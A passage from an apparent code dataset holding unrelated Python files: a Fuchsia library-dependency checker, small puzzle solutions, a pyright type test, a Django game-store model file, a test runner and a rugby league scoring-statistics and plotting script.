self._zircon_dir = zircon_dir\n self._command = [gn_binary, '--root=' + zircon_dir, 'refs', build_dir,\n '--all-toolchains']\n\n def find_references(self, 
type, name):\n category_label = '//system/' + type\n base_label = '//system/' + type + '/' + name\n\n command = self._command + [base_label + ':*']\n try:\n output = subprocess.check_output(command)\n except subprocess.CalledProcessError:\n return None\n\n references = set()\n for line in output.splitlines():\n line = line.strip()\n if line.startswith(base_label):\n continue\n # Remove target name and toolchain.\n line = line[0:line.find(':')]\n if line == category_label:\n continue\n # Insert 'zircon' directory at the start.\n line = '//zircon' + line[1:]\n references.add(line)\n\n return references\n\n\n def find_libraries(self, type):\n base = os.path.join(self._zircon_dir, 'system', type)\n def has_build_file(dir):\n return os.path.isfile(os.path.join(base, dir, 'BUILD.gn'))\n for _, dirs, _ in os.walk(base):\n return filter(has_build_file, dirs)\n\n\ndef main():\n parser = argparse.ArgumentParser('Determines whether libraries can be '\n 'moved out of the ZN build')\n parser.add_argument('--build-dir',\n help='Path to the GN build dir',\n required=True)\n type = parser.add_mutually_exclusive_group(required=True)\n type.add_argument('--banjo',\n help='Inspect Banjo libraries',\n action='store_true')\n type.add_argument('--fidl',\n help='Inspect FIDL libraries',\n action='store_true')\n type.add_argument('--ulib',\n help='Inspect C/C++ libraries',\n action='store_true')\n parser.add_argument('name',\n help='Name of the library to inspect; if empty, scan '\n 'all libraries of the given type',\n nargs='?')\n args = parser.parse_args()\n\n source_dir = FUCHSIA_ROOT\n zircon_dir = os.path.join(source_dir, 'zircon')\n build_dir = os.path.abspath(args.build_dir)\n\n if sys.platform.startswith('linux'):\n platform = 'linux-x64'\n elif sys.platform.startswith('darwin'):\n platform = 'mac-x64'\n else:\n print('Unsupported platform: %s' % sys.platform)\n return 1\n gn_binary = os.path.join(source_dir, 'prebuilt', 'third_party', 'gn',\n platform, 'gn')\n\n finder = Finder(gn_binary, zircon_dir, build_dir)\n\n if args.fidl:\n type = 'fidl'\n elif args.banjo:\n type = 'banjo'\n elif args.ulib:\n type = 'ulib'\n\n # Case 1: a library name is given.\n if args.name:\n name = args.name\n if args.fidl:\n # FIDL library names use the dot separator, but folders use an\n # hyphen: be nice to users and support both forms.\n name = name.replace('.', '-')\n\n references = finder.find_references(type, name)\n\n if references is None:\n print('Could not find \"%s\", please check spelling!' 
% args.name)\n return 1\n elif references:\n print('Nope, there are still references in the ZN build:')\n for ref in sorted(references):\n print(' ' + ref)\n else:\n print('Yes you can!')\n\n return 0\n\n # Case 2: no library name given.\n print('Warning: this operation can take a while!')\n names = finder.find_libraries(type)\n movable = set()\n for name in names:\n references = finder.find_references(type, name)\n if not references:\n movable.add(name)\n if movable:\n print('These libraries are free to go:')\n for name in sorted(movable):\n print(' ' + name)\n else:\n print('No library may be moved')\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"winksaville/fuchsia","sub_path":"scripts/unification/can_i_move_out.py","file_name":"can_i_move_out.py","file_ext":"py","file_size_in_byte":4485,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"9924855770","text":"from sys import stdin, stdout\n\ninput = stdin.readline\nprint = stdout.write\n\nminval = 1000000000\nmaxval = -1000000000\n\n\ndef dfs(Op, res, cnt):\n global A, minval, maxval\n cnt += 1\n\n if sum(Op) == 0:\n minval = min(minval, res)\n maxval = max(maxval, res)\n\n if Op[0] > 0:\n Op1 = Op.copy()\n Op1[0] -= 1\n dfs(Op1, res + A[cnt], cnt)\n if Op[1] > 0:\n Op2 = Op.copy()\n Op2[1] -= 1\n dfs(Op2, res - A[cnt], cnt)\n if Op[2] > 0:\n Op3 = Op.copy()\n Op3[2] -= 1\n dfs(Op3, res * A[cnt], cnt)\n if Op[3] > 0:\n Op4 = Op.copy()\n Op4[3] -= 1\n if res < 0 and A[cnt] > 0:\n dfs(Op4, -int(abs(res) / A[cnt]), cnt)\n else:\n dfs(Op4, res // A[cnt], cnt)\n\n\nN = input()\nA = list(map(int, input().split()))\nOp = list(map(int, input().split()))\n\ndfs(Op, A[0], 0)\n\nprint(str(maxval) + '\\n')\nprint(str(minval))\n","repo_name":"Anjunheon/coding-test","sub_path":"BOJ/14888.py","file_name":"14888.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35629645735","text":"# This sample tests that literal values are retained by the constraint\n# solver if they are found as type arguments.\n\nfrom typing import Literal\n\n\n_L1 = Literal[\"foo\", \"bar\"]\n\n\ndef combine(set1: set[_L1], set2: set[_L1]) -> None:\n x = set1 | set2\n reveal_type(x, expected_text=\"set[Literal['foo', 'bar']]\")\n","repo_name":"microsoft/pyright","sub_path":"packages/pyright-internal/src/tests/samples/typeVar11.py","file_name":"typeVar11.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":11208,"dataset":"github-code","pt":"48"} +{"seq_id":"8879287597","text":"import sys\n\nlines = iter(sys.stdin.readlines())\npsum = 0\nel = lambda l: set(item for item in l.strip())\n\nwhile True:\n try:\n e1 = el(next(lines))\n e2 = el(next(lines))\n e3 = el(next(lines))\n except StopIteration:\n break\n d = e1.intersection(e2).intersection(e3).pop()\n psum += ord(d) - 96 if d.islower() else ord(d) - 64 + 26\nprint(psum)\n","repo_name":"rschmied/aoc-2022","sub_path":"day3/part2-b.py","file_name":"part2-b.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14743821161","text":"from db_fixture import test_data\nimport time\nfrom HTMLTestRunner import HTMLTestRunner\nfrom unittest import defaultTestLoader\n\n# Test cases live in the interface directory under the current folder\ntest_dir = './interface'\ntestsuit = defaultTestLoader.discover(test_dir,pattern='*_test_case.py')\nif 
__name__=='__main__':\n # Initialize the interface test data\n test_data.init_data()\n now = time.strftime(\"%Y-%m-%d %H_%M_%S\")\n report_name='./report/'+now+'result.html'\n fp = open(report_name,'wb')\n runner = HTMLTestRunner(stream=fp,\n title='Launch event sign-in system API automation test',\n description='Runtime environment: MySQL(PyMySql), Requests, unittest')\n runner.run(testsuit)\n fp.close()\n","repo_name":"lyedzp/jiekouzidonghua","sub_path":"pyrequest/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22792363024","text":"from django.db import models\r\nfrom django.contrib.auth.models import User\r\nfrom GameArena.models import Game\r\nimport datetime\r\n\r\n# Purchase information\r\n\r\n\r\n\"\"\"\r\n@Class_Name: Order\r\n@Params: Payment Ref - Payment reference field\r\n Order_Date - Date the order was made\r\n Status - Status of the order\r\n Checksum - Check sum value\r\n\r\n\"\"\"\r\n\r\n\r\nclass Order(models.Model):\r\n paymentRef = models.IntegerField(null=True, blank=True)\r\n order_date = models.DateTimeField(default=datetime.datetime.now, blank=True)\r\n status = models.CharField(max_length=10, null=False, default=\"pending\")\r\n checksum = models.CharField(max_length=100, null=True, blank=True)\r\n\r\n class Meta:\r\n db_table = \"Order\"\r\n ordering = ['order_date']\r\n\r\n\r\n\"\"\"\r\n@Class_Name: Purchase\r\n@Params: game_details - Details pertaining to the game (Foreign Key)\r\n Player_Details - details of the player (Foreign Key)\r\n Cost - Cost associated with the game(s) of purchase\r\n Purchase_Date - date of purchase\r\n order - Order ID\r\n\r\n\"\"\"\r\n\r\n\r\nclass Purchase(models.Model):\r\n game_details = models.ForeignKey(Game, related_name='purchased_games', on_delete=models.CASCADE)\r\n player_details = models.ForeignKey(User, related_name='purchased_players', on_delete=models.CASCADE)\r\n cost = models.DecimalField(default=0.0, decimal_places=2, max_digits=10)\r\n purchase_date = models.DateTimeField(default=datetime.datetime.now, blank=True)\r\n order = models.ForeignKey(Order, related_name='order_items', null=True, blank=True)\r\n\r\n class Meta:\r\n db_table = \"Purchase\"\r\n ordering = ['purchase_date']\r\n\r\n def shortdesc(self):\r\n if (len(self.game_details.description) > 100):\r\n return self.game_details.description[0:100] + \"...\"\r\n else:\r\n return self.game_details.description\r\n\r\n def as_json_dict(self):\r\n res = {\r\n 'game': self.game_details.id,\r\n 'buyer': self.player_details.username,\r\n 'cost': self.cost,\r\n 'purchase_date': str(self.purchase_date),\r\n 'orderid': self.order.id\r\n }\r\n return res\r\n\r\n def __str__(self):\r\n return self.game_details.name\r\n\r\n\r\n\"\"\"\r\n@Class_Name: Cart\r\n@Params: game_details - Details of the game purchased - Foreign Key\r\n Player_details - Player details ( Foreign Key)\r\n cart_Date - date of the cart - cart creation date\r\n order - order id (Foreign key)\r\n\"\"\"\r\n\r\n\r\nclass Cart(models.Model):\r\n game_details = models.ForeignKey(Game, related_name='carted_games', on_delete=models.CASCADE)\r\n player_details = models.ForeignKey(User, related_name='carted_players', on_delete=models.CASCADE)\r\n cart_date = models.DateTimeField(default=datetime.datetime.now, blank=True)\r\n order = models.ForeignKey(Order, related_name='order_cartitems', null=True, blank=True)\r\n\r\n class Meta:\r\n db_table = \"Cart\"\r\n ordering = ['cart_date']\r\n\r\n def __str__(self):\r\n return 
self.game_details.name\r\n","repo_name":"sklrsn/gamestore","sub_path":"gamestore/Store/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35901120387","text":"# -*- coding: utf-8 -*-\n\"\"\"\nGenerting plots\n\"\"\"\n\n\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport json\nimport matplotlib.patches as pat\nimport matplotlib.pyplot as plt\nfrom scipy.stats import poisson\nfrom scipy.stats import skellam\n \nplt.clf()\n\ngames= pd.read_csv('pipeline\\\\games')\nwith open('pipeline\\\\match_timelines.json') as data_file:\n data = json.load(data_file)\nmatch_timelines = pd.DataFrame.from_dict(data)\n\nyear=2019\nmatch = 'Sharks vs Raiders'\ngame=games[(games['Year']==year)&(games['Match']==match)]\n\n\n\n#Associating a colour with each team\nteam_cols = {'Storm':'#011641',\n 'Rabbitohs':'#003C1A',\n 'Roosters':'#000080',\n 'Raiders':'#32CD32',\n 'Sea Eagles':'#6F0F3B',\n 'Eels':'#006EB5',\n 'Panthers':'#221F20',\n 'Broncos':'#FABF16',\n 'Knights':'#EE3524',\n 'Wests Tigers':'#F68C1A',\n 'Sharks':'#00A9D8',\n 'Warriors':'#BDBCBC',\n 'Cowboys':'#FFDD02',\n 'Dragons':'#E2231B',\n 'Bulldogs':'#00539F',\n 'Titans':'#FBB03F'}\n\n\nfield_made= pd.read_csv('pipeline\\\\field_made')\nfield_made_level =field_made[(field_made['Margin at Goal']==0)&(field_made['Time']>40)]\nfml_wins = field_made_level.loc[field_made_level['Result']=='Won','Time']\nfml_ties = field_made_level.loc[field_made_level['Result']=='Tied','Time']\nfml_losses = field_made_level.loc[field_made_level['Result']=='Lost','Time'] \n\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 5)\nax=fig.add_subplot(1,1,1)\nplt.hist([fml_wins,fml_ties,fml_losses],stacked=True,bins=np.arange(65.5,81.5))\nplt.legend(['Won','Tied','Lost'])\nplt.xlabel('Time (mins)')\nplt.ylim(0,11)\nplt.title('Results of field goals kicked when scores level')\n\nfig.savefig('images\\\\field_goal_level.png')\n\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 5)\nax=fig.add_subplot(1,1,1)\nplt.hist(games['Tries+'],bins=np.arange(-0.5,13.5),normed=True)\nplt.plot(np.arange(0,13),poisson.pmf(np.arange(0,13),np.mean(games['Tries+'])))\nplt.legend(['Expected if Poisson','Observed'])\nplt.xlabel('Number of tries')\nplt.title('Tries: obxerved vs expected')\nfig.savefig('images\\\\poisson_try.png')\n\n\nf = np.unique(field_made['Margin at Goal'],return_counts=True)\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 5)\nax=fig.add_subplot(1,1,1)\nplt.bar(f[0],f[1],color='green')\nplt.xlim(-0.7,21)\nplt.xlabel('Margin at Goal')\nplt.ylabel('No. 
of Field Goals')\nplt.xticks(np.arange(0,24,6))\n\nfig.savefig('images\\\\field_goal_margins.png')\n\nfrom sklearn import linear_model\nfrom sklearn import metrics\nx = np.array(field_made_level['Time']).reshape(-1,1)\ny = np.array(field_made_level['Result']=='Won')\nlr = linear_model.LogisticRegression(solver='newton-cg').fit(x, y)\n \nlr.intercept_\nlr.coef_\n\n\n#example of scoreline\ns=get_scoreline('Sharks vs Raiders',2019)\ndef plot_score(scoreline):\n fig, ax = plt.subplots()\n home=ax.plot(scoreline['Time'],scoreline.iloc[:,1],color=team_cols[scoreline.columns[1]])\n away=ax.plot(scoreline['Time'],scoreline.iloc[:,2],color=team_cols[scoreline.columns[2]])\n plt.title(match+' ' +str(year))\n plt.xlabel('Match Time (mins)')\n plt.ylabel('Score')\n plt.legend([scoreline.columns[1],scoreline.columns[2]])\n plt.show()\n return fig\nfig = plot_score(s)\nfig.savefig('images\\\\Sharks_Raiders_scoreline.png')\nplt.clf()\n\ndef all_times(event):\n a=match_timelines[event].apply(pd.Series).stack().reset_index(drop=True)\n a=a[a<=80]\n return a\n\n#See the distribution of scoring events\nfg=all_times('Drop Goal-Made')\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 5)\nax=fig.add_subplot(1,1,1)\nplt.hist(fg,bins=np.arange(0.01,82.01,2))\nplt.xlabel('Game Time (mins)')\nplt.title('Distributions of Drop Goals Over 80 Minutes')\nplt.show()\nfig.savefig('images\\\\field_goal_hist.png')\n\nplt.clf()\n\npg=all_times('Penalty Shot-Made')\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 5)\nax=fig.add_subplot(1,1,1)\nplt.hist(pg,bins=np.arange(0.01,82.01,2),color='red')\nplt.xlabel('Game Time (mins)')\nplt.title('Distributions of Penalty Goals Over 80 Minutes')\nplt.show()\nfig.savefig('images\\\\penalty_goal_hist.png')\n\nplt.clf()\n\ntr=all_times('Try')\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 5)\nax=fig.add_subplot(1,1,1)\nplt.hist(tr,bins=np.arange(0.01,82.01,2),color='green')\nplt.xlabel('Game Time (mins)')\nplt.title('Distributions of Tries Over 80 Minutes')\nplt.show()\nfig.savefig('images\\\\penalty_goal_hist.png')\n\nplt.clf()\n\n\ndef get_max(x):\n try:\n if max(x)<=80:\n return max(x)\n else:\n x=pd.Series(x)\n return np.max(x[x<=80])\n except:\n return None\n#When are the last points scored\ne=match_timelines['Try'].map(lambda x: get_max(x))\nf=match_timelines['Penalty Shot-Made'].map(lambda x: get_max(x))\ng=match_timelines['Drop Goal-Made'].map(lambda x: get_max(x))\nlast = pd.concat([e,f,g],axis=1)\n\nlasts = last.dropna(how='all')\nlast = lasts.max(axis=1)\nlast_score = lasts.idxmax(axis=1) \nx=[last[last_score=='Try'],last[last_score=='Penalty Shot-Made'],last[last_score=='Drop Goal-Made']]\nplt.hist(x,bins=80,stacked=True)\nplt.legend(['Try','Penalty','Field Goal'])\n\n\n\n\ntry_rate = 80/(tr.shape[0]/games.shape[0])\nexp_times = np.exp(-np.linspace(0,81,80)/try_rate)\nplt.plot(np.linspace(0,81,80),exp_times*games.shape[0])\nplt.hist(80-e[e>0])\n\ndef get_min(x):\n try:\n if min(x)<=80:\n return min(x)\n else:\n return 81\n except:\n return 81\n\nteam_timelines = match_timelines.loc[match_timelines['Team']!='']\n\ne1=team_timelines['Try'].map(lambda x: get_min(x))\nplt.hist(e1,bins=80,cumulative=True,density=True)\nplt.plot(np.linspace(0,81,80),(1-exp_times))\nplt.xlabel(\"Time until first try\")\n\n\npen_rate = 80/(pg.shape[0]/match_timelines[match_timelines['Team']!=''].shape[0])\ncum_pen_exp =1- np.exp(-np.linspace(0,81,80)/pen_rate)\n\nf1=team_timelines['Penalty Shot-Made'].map(lambda x: 
get_min(x))\nplt.hist(f1,bins=80,cumulative=True,density=True)\nplt.plot(np.linspace(0,81,80),cum_pen_exp)\nplt.ylim(0,0.6)\nplt.xlabel(\"Time until first pealty goal\")\n\nfield_rate = 80/(fg.shape[0]/games.shape[0])\ncum_field_exp =1- np.exp(-np.linspace(0,81,80)/field_rate)\n\ng1=team_timelines['Drop Goal-Made'].map(lambda x: get_min(x))\nplt.hist(g1,bins=80,cumulative=True,density=True)\nplt.plot(np.linspace(0,81,80),cum_field_exp)\nplt.ylim(0,0.2)\nplt.xlabel(\"Time until first field goal\")\n\ng=match_timelines['Drop Goal-Made'].map(lambda x: get_max(x))\n\n\n#Plotting probabiliy heat map for successfully kicking a field goal\na=np.arange(1,50)\nb=np.arange(-33.5,34.5)\n(A,B)=np.meshgrid(a,b)\n\n\n\n\ndist=np.sqrt(A**2+B**2)\n\nang_left = np.arctan((B+2.75)/A)\nang_right = np.arctan((B-2.75)/A) \n\nangle =np.abs(ang_left-ang_right)\nsig= 1/(1+np.exp((dist-25)/10))\n\nfield_prob = np.zeros((68,60))\n\nfield_prob[:,11:]= sig\n\nplt.imshow(field_prob,cmap='RdYlGn_r')\n\nplt.imshow(angle*5,cmap='RdYlGn_r')\n\n\nd = np.arange(6)\n(C,D)=np.meshgrid(a,d)\n\ntry_prob = 0.8*np.exp(-C/20)*np.power(0.95,D)\n\nplt.imshow(try_prob,cmap='RdYlGn_r')\n\ndef draw_pitch(ax,fill=True,numbers=True):\n # focus on only half of the pitch\n #Pitch Outline & Centre Line\n if fill:\n Pitch = pat.Rectangle([0,0], width = 60, height = 68, facecolor='green', edgecolor='white')\n else:\n Pitch = pat.Rectangle([0,0], width = 60, height = 68, fill=False)\n #Left, Right Penalty Area and midline\n goalline =pat.ConnectionPatch([10,0], [10,68], \"data\", \"data\",color='white',lw=4)\n tenline =pat.ConnectionPatch([20,0], [20,68], \"data\", \"data\",color='white')\n twentyline =pat.ConnectionPatch([30,0], [30,68], \"data\", \"data\",color='white')\n thirtyline =pat.ConnectionPatch([40,0], [40,68], \"data\", \"data\",color='white')\n fortyline =pat.ConnectionPatch([50,0], [50,68], \"data\", \"data\",color='red')\n midline = pat.ConnectionPatch([60,0], [60,68], \"data\", \"data\",color='white')\n \n #goalposts\n leftpost=pat.ConnectionPatch([10,30], [2,40],\"data\",\"data\",color='white')\n rightpost=pat.ConnectionPatch([10,38], [2,48],\"data\",\"data\",color='white')\n crossbar = pat.ConnectionPatch([7,33.65], [7,41.65],\"data\",\"data\",color='white')\n thedot = pat.ConnectionPatch([7,37.5], [7,37.8],\"data\",\"data\",color='black')\n\n\n element = [Pitch, goalline,tenline,twentyline,thirtyline,fortyline,midline,leftpost,rightpost,crossbar,thedot]\n for i in element:\n ax.add_patch(i)\n if numbers==True: \n plt.text(18,10,'1',color='white',fontsize=17)\n plt.text(20,10,'0',color='white',fontsize=17)\n plt.text(27,10,'2',color='white',fontsize=17)\n plt.text(30,10,'0',color='white',fontsize=17)\n plt.text(37,10,'3',color='white',fontsize=17)\n plt.text(40,10,'0',color='white',fontsize=17)\n plt.text(47,10,'4',color='white',fontsize=17)\n plt.text(50,10,'0',color='white',fontsize=17)\n\n \nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 6.8)\nax=fig.add_subplot(1,1,1)\ndraw_pitch(ax) #overlay our different objects on the pitch\nplt.ylim(-2, 70)\nplt.xlim(-2, 62)\nplt.axis('off')\nplt.show()\n\nfig.savefig('images\\\\pitch.png')\n\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(7, 5)\nax=fig.add_subplot(1,1,1)\ndraw_pitch(ax,fill=False) #overlay our different objects on the pitch\nheat =plt.imshow(field_prob,cmap='RdYlGn_r')\nfig.colorbar(heat)\nplt.ylim(0, 68)\nplt.xlim(0, 60)\nplt.axis('off')\nplt.title('Probability of Successfully Kicking a Field 
Goal')\nplt.show()\n\nfig.savefig('images\\\\field_probs.png')\n\n\n#\n\nd = np.arange(6)\n(C,D)=np.meshgrid(a,d)\n\ntry_prob = 0.5*np.exp(-C/20)*np.power(0.9,D)\n\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(7, 5)\nax=fig.add_subplot(1,1,1)\nheat=plt.imshow(try_prob,cmap='RdYlGn_r',aspect='auto')\nfig.colorbar(heat)\n\nplt.xlabel('Distance from Tryline (m)')\nplt.ylabel('Tackle Count')\nplt.title('Probability of Scoring a Try')\nplt.show()\n\nfig.savefig('images\\\\try_probs.png')\n\nplt.clf()\n\n\n\nraiders_win = pd.read_csv('pipeline\\\\raiders_win',header=None)\n\ndef decider(win_probs, t, tackle):\n win_prob_if_attempt = field_prob[:,11:]*win_probs.iloc[t-60,0] + (1-field_prob[:,11:])*win_probs.iloc[t-60,2]\n win_prob_if_no_attempt = try_prob[tackle,:]*win_probs.iloc[t-60,1] + (1-try_prob[tackle,:])*win_probs.iloc[t-60,2] \n \n ar = np.zeros((68,60))\n ar[:,11:] = win_prob_if_attempt-win_prob_if_no_attempt\n fig=plt.figure() #set up the figures\n# fig.set_size_inches(7, 5)\n# ax=fig.add_subplot(1,1,1)\n# draw_pitch(ax,fill=False) #overlay our different objects on the pitch\n# cmap = plt.cm.RdYlGn_r\n# cmap.set_under(color='green')\n# heat =plt.imshow(ar,aspect='auto',cmap=cmap,vmin=0.001,vmax=0.25)\n# plt.ylim(0, 68)\n# plt.xlim(0, 60)\n# plt.axis('off')\n return ar, fig\ncmap = plt.cm.RdYlGn_r\ncmap.set_under(color='green')\nfig,axes=plt.subplots(4,3) #set up the figures\n#fig.set_size_inches(7, 5)\nfor i in np.arange(4):\n for j in np.arange(3):\n ax=axes[i,j]\n draw_pitch(ax,fill=False,numbers=False)\n ax.imshow(decider(raiders_win,62+5*i,1+2*j)[0],aspect='auto',cmap=cmap,vmin=0.001,vmax=0.25,origin='lower')\n ax.axis('off')\n\n\ncols = 1+2*np.arange(3)\nrows = 62+5*np.arange(4)\n\n\nfor ax, col in zip(axes[-1], cols):\n ax.annotate(col, xy=(0.5, 0), xytext=(0, -10),\n xycoords='axes fraction', textcoords='offset points',\n size='large', ha='center', va='baseline')\n\nfor ax, row in zip(axes[:,0], rows):\n ax.annotate(row, xy=(0, 0.5), xytext=(-ax.yaxis.labelpad, 0),\n xycoords='axes fraction', textcoords='offset points',\n size='large', ha='right', va='center')\n\nfig.text(0.5, 0, 'Tackle Count',size='large', ha='center')\nfig.text(0, 0.5, 'Time', va='center',size='large', rotation='vertical')\nfig.tight_layout()\nplt.show()\nfig.savefig('images\\\\cases.png')\n\nimport scipy as scipy\nav_tries=np.mean(games['Tries+'])\n\ndef exp_tries(game, av_tries,home=True):\n exp_tries = game.loc[game['Home']==home,'tries_scored_per_game'].iloc[0]*game.loc[game['Home']!=home,'tries_conceded_per_game'].iloc[0]/av_tries\n return exp_tries\n\nexp_home_tries = games.groupby(['Year','Match'],as_index=False).apply(lambda x:exp_tries(x,av_tries,home=True))\nexp_away_tries = games.groupby(['Year','Match'],as_index=False).apply(lambda x:exp_tries(x,av_tries,home=False))\n\nexp_tries = exp_home_tries.reset_index().merge(exp_away_tries.reset_index(),on=['Year','Match'])\n\nhome_games=games.loc[games['Home']]\nexp_obs_tries = exp_tries.merge(home_games[['Year','Match','Tries+','Tries-']],on=['Year','Match'])\nmat=exp_obs_tries[exp_obs_tries['Year']>2013]\n\nmat.to_csv('pipeline\\\\exp_obs')\nchi_stat = (exp_obs_tries.iloc[:,4]-exp_obs_tries.iloc[:,2])**2/exp_obs_tries.iloc[:,2]\n\nobs_home = mat.iloc[:,4]\nexp_home = mat.iloc[:,2]\n\nhome_dev = 2*(obs_home*np.log(obs_home/exp_home)-obs_home+exp_home)\nhome_dev[obs_home==0]=2*exp_home\n\nobs_away = mat.iloc[:,5]\nexp_away = mat.iloc[:,3]\n\naway_dev = 
2*(obs_away*np.log(obs_away/exp_away)-obs_away+exp_away)\naway_dev[obs_away==0]=2*exp_away\n\n\n\npennies= games[['PenaltyGoals+','penalty_goals_per_game']].iloc[384:]\npennies.to_csv('pipeline\\\\exp_obs_pen')\n\nimport scipy.stats as stats\n\n1-scipy.stats.chi2.cdf(np.sum(home_dev), 1151)\n\n1-scipy.stats.chi2.cdf(np.sum(away_dev), 1151)\n\n1-scipy.stats.chi2.cdf(np.sum(away_dev)+np.sum(home_dev), 2304)\n\n1-scipy.stats.chi2.cdf(2348.2, 2302)\n\n\npens = match_timelines.loc[match_timelines['Team']!='','Penalty Shot-Made']\n\ntimes=[]\nevents=[]\nfor i in np.arange(pens.shape[0]):\n if np.isnan(pens[i]).any():\n times.append(80.0)\n events.append(0)\n else:\n x=pens[i]\n x.sort()\n for j in np.arange(len(x)):\n if j==0:\n times.append(x[j])\n events.append(1)\n else:\n times.append(x[j]-x[j-1])\n events.append(1)\n \n times.append(80-x[-1])\n events.append(0)\n \np = pd.DataFrame({'time':times,'Goal':events})\np1=p.loc[(p['time']>0)&(p['time']<=80)] \n\np1.to_csv('pipeline\\\\penalty')\np1.sort_values(by='time',inplace=True)\np1['Risk']= p1.shape[0]-np.arange(p1.shape[0],)\np1['Cond_no_goal']=(p1['Risk']-p1['Goal'])/p1['Risk']\np1['SurvProb']=np.cumprod(p1['Cond_no_goal'])\n\nplt.plot(p1['time'],1-p1['SurvProb'])\nplt.plot(p1['time'],1-np.exp(-p1['time']/pen_rate))\nplt.legend(['Observed','Expected'])\n\ntrs = match_timelines.loc[match_timelines['Team']!='','Try']\n\ntimes=[]\nevents=[]\nfor i in np.arange(trs.shape[0]):\n if np.isnan(trs[i]).any():\n times.append(80.0)\n events.append(0)\n else:\n x=trs[i]\n x.sort()\n for j in np.arange(len(x)):\n if j==0:\n times.append(x[j])\n events.append(1)\n else:\n times.append(x[j]-x[j-1])\n events.append(1)\n \n times.append(80-x[-1])\n events.append(0)\n\n\nt = pd.DataFrame({'time':times,'Goal':events})\nt1=t.loc[(t['time']>0)&(t['time']<=80)] \n\nt1.to_csv('pipeline\\\\try')\nt1.sort_values(by='time',inplace=True)\nt1['Risk']= t1.shape[0]-np.arange(t1.shape[0],)\nt1['Cond_no_goal']=(t1['Risk']-t1['Goal'])/t1['Risk']\nt1['SurvProb']=np.cumprod(t1['Cond_no_goal'])\n\ntry_rate = 80/(tr.shape[0]/match_timelines[match_timelines['Team']!=''].shape[0])\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6,5)\nax=fig.add_subplot(1,1,1)\nplt.plot(t1['time'],t1['SurvProb'])\nplt.plot(t1['time'],np.exp(-t1['time']/try_rate))\nplt.legend(['Observed','Expected'])\nplt.title('Survival until next try: observed vs expected')\nfig.savefig('images\\\\try_srv.png')\n\nha =np.array(home_games[['Tries+','Tries-']])\nhh=[]\nfor i in np.arange(np.max(ha,axis=0)[0]+1):\n hh.append(np.unique(ha[ha[:,0]==i,1],return_counts=True))\n\nhj = np.zeros((np.max(ha,axis=0)+1))\nfor i in np.arange(np.max(ha,axis=0)[0]+1):\n for j in np.arange(len(hh[i][0])):\n hj[i,hh[i][0][j]] = hh[i][1][j]\n\nfact_h = np.ones(hj.shape[0]) \nfact_h[1:]=np.cumprod(np.arange(1,hj.shape[0]))\nfact_a = np.ones(hj.shape[1]) \nfact_a[1:]=np.cumprod(np.arange(1,hj.shape[1]))\n\nmean_home= np.mean(ha[:,0])\nmean_away = np.mean(ha[:,1])\nex_h = mean_home**(np.arange(hj.shape[0]))*np.exp(-mean_home)/fact_h\nex_a = mean_away**(np.arange(hj.shape[1]))*np.exp(-mean_away)/fact_a\n\nexp_ha =np.outer(ex_h,ex_a)*ha.shape[0]\ncf = np.corrcoef(ha.T)\n\n\n#Using Skellam distribution to find probabilty of victory if field goal is kicked\nseconds = np.linspace(0,80,4801)\nnew_mean = (80-seconds)/try_rate\n\nfrom scipy.stats import skellam\n\n\ndef prob_win(n):\n z=np.zeros((n+1,4801))\n for i in np.arange(n+1):\n z[i,:]=skellam.cdf(i,new_mean,new_mean)\n return z\n\nz= prob_win(3)\n\n\ndef 
prob_win_change(n):\n z=np.zeros((n+1,4801))\n for i in np.arange(n+1):\n z[i,:]=skellam.pmf(i,new_mean,new_mean)*0.5\n return z\n\nchange= prob_win_change(3)\nzoomz = z.T[3600:,:]\nzoomchange = change.T[3600:,:]\nyoomy = zoomz-zoomchange\n\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(10,10)\nax1=fig.add_subplot(2,2,1)\nout_mat = [[0,1,1,1],[-1,0,1,1],[-1,-1,0,1],[-1,-1,-1,0]]\nplt.imshow(out_mat, interpolation='nearest',cmap='RdBu')\nplt.title('Outcomes')\nplt.ylabel('Opposition Tries')\nplt.xlabel('Tries')\nplt.xticks([0,1,2,3])\nplt.yticks([0,1,2,3])\ns = [['DW','WW','WW','WW'], ['LL', 'DW','WW','WW'],['LL','LL','DW','WW'],['LL','LL','LL','DW']]\nfor i in range(4):\n for j in range(4):\n plt.text(j,i, str(s[i][j]))\n\nax2=fig.add_subplot(2,2,2)\nplt.plot(seconds[3600:],yoomy)\nplt.title('Probability of victory before field goal')\nplt.xlabel('Match time')\nplt.legend(['0','6','12','18'],title=\"Lead by:\",loc='lower left')\nplt.ylim(0.48,1.02)\nax23=fig.add_subplot(2,2,3)\nplt.plot(seconds[3600:],zoomz)\nplt.title('Probability of victory after field goal')\nplt.xlabel('Match time')\nplt.ylim(0.48,1.02)\nax4=fig.add_subplot(2,2,4)\nplt.plot(seconds[3600:],zoomchange)\nplt.title('Increase in probability of victory after field goal')\nplt.xlabel('Match time')\nfig.savefig('images\\\\vic_prob.png')\n\n\n\nplt.clf()\n\n\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 6.8)\nax=fig.add_subplot(1,1,1)\n\n\nfig=plt.figure() #set up the 